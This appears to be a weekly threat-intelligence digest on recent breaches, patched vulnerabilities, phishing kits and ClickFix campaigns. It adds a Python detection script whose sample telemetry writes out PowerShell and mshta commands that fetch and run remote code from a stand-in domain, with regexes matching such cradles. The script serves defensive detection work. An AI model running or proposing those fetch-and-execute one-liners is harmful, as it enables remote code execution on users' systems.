Major Incidents or Breaches

  • Synnovis, a UK pathology services provider, has notified healthcare providers of a data breach stemming from the June 2024 ransomware attack (claimed at the time by the Qilin group), in which patient data was stolen.
  • Over 67,000 fake npm packages have been published in a large-scale, worm-like spam campaign that has been flooding the npm registry since early 2024; the packages self-propagate by publishing further packages and appear to be financially motivated (researchers link them to farming tea.xyz token rewards rather than to malware delivery).
  • DanaBot malware has resumed activity, infecting Windows systems after a roughly six-month hiatus that followed the law enforcement disruption of its infrastructure (Operation Endgame) in May 2025.
  • A campaign targeting Microsoft 365 users is leveraging the Quantum Route Redirect (QRR) phishing kit to bypass email security and steal credentials, with victims in over 90 countries. The kit serves a harmless page to automated link scanners and routes only real users to the credential-harvesting page, so URL-detonation alone may not reveal the lure.
  • Phishing emails posing as spam-filter alerts are being used to lure users to fake login pages and steal their credentials.

Newly Discovered Vulnerabilities

  • Amazon’s threat intelligence team disclosed, from its honeypot telemetry, that an advanced threat actor exploited two vulnerabilities as zero-days before their public disclosure: “Citrix Bleed 2” (CVE-2025-5777) in Citrix NetScaler ADC/Gateway and CVE-2025-20337 in Cisco Identity Services Engine (ISE). Both vendors have since shipped fixes; exposed appliances should be patched and reviewed for signs of earlier compromise, since patching does not evict an attacker who is already in.
  • Microsoft’s monthly update fixed 63 security vulnerabilities, including a Windows kernel elevation-of-privilege zero-day that is under active exploitation.
  • Google Chrome (version 142) and Mozilla Firefox (version 145) have patched multiple high-severity vulnerabilities in their latest releases.
  • Ivanti and Zoom have patched high-severity vulnerabilities that could enable arbitrary file writes, privilege escalation, code execution, and information disclosure.
  • Intel, AMD, and Nvidia have published advisories addressing over 60 vulnerabilities in their products as part of their regular security updates.
  • Siemens, Rockwell, Aveva, and Schneider Electric have addressed vulnerabilities affecting industrial control systems.

Notable Threat Actor Activity

  • Google has filed a lawsuit in US federal district court against China-based threat actors operating the “Lighthouse” Phishing-as-a-Service (PhaaS) platform, attributed to the group “Smishing Triad.” The platform facilitated large-scale SMS phishing campaigns, including US toll-payment scam texts, using over 194,000 malicious domains.
  • A single advanced threat actor exploited both the Citrix NetScaler and Cisco ISE zero-days noted above, continuing the pattern of targeting the network-edge and identity infrastructure that fronts enterprise remote access.
  • The SmartApeSG campaign is using ClickFix social engineering techniques, including fake Cloudflare verification pages, to push NetSupport RAT malware.
  • CISA continues to report active threats against Cisco ASA and Firepower devices; affected devices should be patched and checked for compromise under CISA’s existing guidance for these products.

Trends, Tools, or Tactics of Interest

  • ClickFix attacks are becoming more sophisticated, with recent campaigns mimicking Cloudflare verification checks to trick users into pasting and running malicious commands themselves (typically via the Win+R Run box or a terminal), which sidesteps download-based controls because the user is the delivery mechanism.
  • The Quantum Route Redirect technique simplifies the attacker’s workflow by packaging redirect infrastructure and scanner evasion into a kit, routing security tools to legitimate pages while real victims reach the phishing site, and is being used to bypass traditional email security controls.
  • Adversary interest in network-edge and identity infrastructure remains high, as evidenced by the zero-day exploitation of Citrix NetScaler and Cisco ISE described above.
  • Passkey management on Windows 11 now supports third-party applications, with 1Password and Bitwarden as initial partners, improving passwordless authentication options.
  • The return of DanaBot and the scale of npm spam attacks highlight persistent threats to software supply chains and end-user systems.
  • Google introduced “Private AI Compute,” a privacy-enhancing technology for secure AI processing in the cloud.
  • Token Security outlined methods to extend Zero Trust principles to autonomous AI agents, emphasizing scoped access and continuous verification.
  • Behavioral (TTP-based) detection is being promoted as more effective than traditional IoC-based hunting for identifying privilege escalation, credential theft, and lateral movement, because hashes and domains are trivial for an adversary to rotate while the underlying technique (how a process is launched, what it does next) changes far less often.
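As an added example that is not from the original page or any vendor product, the script below applies the TTP-based approach from the last bullet to the ClickFix chain described earlier: it scores constructed process-creation events on how a script host was launched (under explorer.exe, as a pasted Win+R command would be) and what the command line does (download cradle, inline evaluation, evasion flags, remote HTA, a fake "verification" comment), decoding any -EncodedCommand payload so the cradle cannot hide inside base64. The event field names, rule weights and thresholds are assumptions for illustration; the sample telemetry is constructed and uses the non-resolving example.invalid domain.

```python
"""Behavioural (TTP-based) detection of ClickFix-style execution chains.

Added example. Event shape loosely follows Sysmon Event ID 1 / EDR telemetry
(pid, image, parent_image, cmdline); field names, weights and thresholds are
assumptions, not any product's schema.
"""
import base64
import re

# Script hosts a ClickFix lure asks the victim to paste a one-liner into, or
# that the pasted command typically invokes.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "curl.exe", "certutil.exe",
}
# Win+R, the Explorer address bar and the Run dialog all execute under explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Behavioural rules: (label, regex). Nothing here names a URL, hash or campaign.
TTP_RULES = [
    ("download_cradle", re.compile(
        r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
        r"start-bitstransfer|curl(\.exe)?|certutil(\.exe)?\s+-urlcache)\b", re.I)),
    ("inline_eval", re.compile(r"(\biex\b|invoke-expression|\|\s*cmd(\.exe)?\b)", re.I)),
    ("evasion_flags", re.compile(
        r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noprofile\b)", re.I)),
    ("remote_hta", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    # ClickFix one-liners often end in a comment that shows the victim a
    # reassuring "verification" string in the Run box. Weak on its own.
    ("captcha_lure_comment", re.compile(r"#.*(not a robot|verification|captcha)", re.I)),
]
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
WEIGHTS = {  # assumed weights; tune against your own baseline
    "interactive_script_host": 2, "encoded_command": 2, "download_cradle": 3,
    "inline_eval": 3, "evasion_flags": 2, "remote_hta": 4, "captcha_lure_comment": 3,
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; return matched TTPs, score and verdict."""
    image, parent = _basename(event["image"]), _basename(event["parent_image"])
    hits = []
    if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS:
        hits.append("interactive_script_host")  # user typed/pasted it
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        hits.append("encoded_command")
    # Run content rules over the visible command line AND the decoded payload,
    # so -EncodedCommand does not hide the cradle from the detector.
    for text in (event["cmdline"], decoded or ""):
        for label, rx in TTP_RULES:
            if label not in hits and rx.search(text):
                hits.append(label)
    score = sum(WEIGHTS[h] for h in hits)
    if score >= 6 and "interactive_script_host" in hits:
        verdict = "clickfix_suspected"  # user-driven launch plus malicious behaviour
    elif score >= 5:
        verdict = "suspicious"          # same TTPs, different delivery path
    else:
        verdict = "benign"
    return {"pid": event["pid"], "ttps": hits, "score": score,
            "decoded": decoded, "verdict": verdict}


def run_detections(events):
    """Return non-benign findings, highest score first."""
    findings = [analyze_event(e) for e in events]
    return sorted((f for f in findings if f["verdict"] != "benign"),
                  key=lambda f: f["score"], reverse=True)


def _encode_ps(command: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real logs). example.invalid never resolves.
SAMPLE_EVENTS = [
    {"pid": 5120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/verify.txt | iex" '
                '# "I am not a robot - reCAPTCHA Verification ID: 7391"'},
    {"pid": 5316, "image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://example.invalid/check.hta"},
    {"pid": 5402, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -nop -enc " + _encode_ps("iex (iwr https://example.invalid/v.txt)")},
    {"pid": 5577, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoExit -Command Get-ChildItem C:\Users\alice\Documents"},
    {"pid": 6010, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",  # e.g. a scheduled task, not a user
     "cmdline": "powershell.exe -ep bypass -c \"(New-Object Net.WebClient).DownloadString('https://example.invalid/u') | iex\""},
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"pid={f['pid']} score={f['score']} verdict={f['verdict']} ttps={f['ttps']}")
```

The point of the split verdict is the one the bullet makes: the scheduled-task event (pid 6010) carries the same cradle and evasion flags as the ClickFix launches but a different delivery path, so it is still flagged, just not as ClickFix; the interactive Get-ChildItem launch scores low because nothing it does is malicious, which keeps the explorer.exe parent from being a false-positive generator on its own.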

Regulatory or Policy Developments Affecting the Security Industry

  • The UK government has introduced the Cyber Security and Resilience Bill to Parliament, legislation that strengthens cybersecurity requirements for operators of critical infrastructure and their suppliers, including hospitals, energy, water, and transport.
  • Kenya has launched the “Code Nation” initiative to train one million workers in technology skills, with a focus on cybersecurity, software engineering, and data science.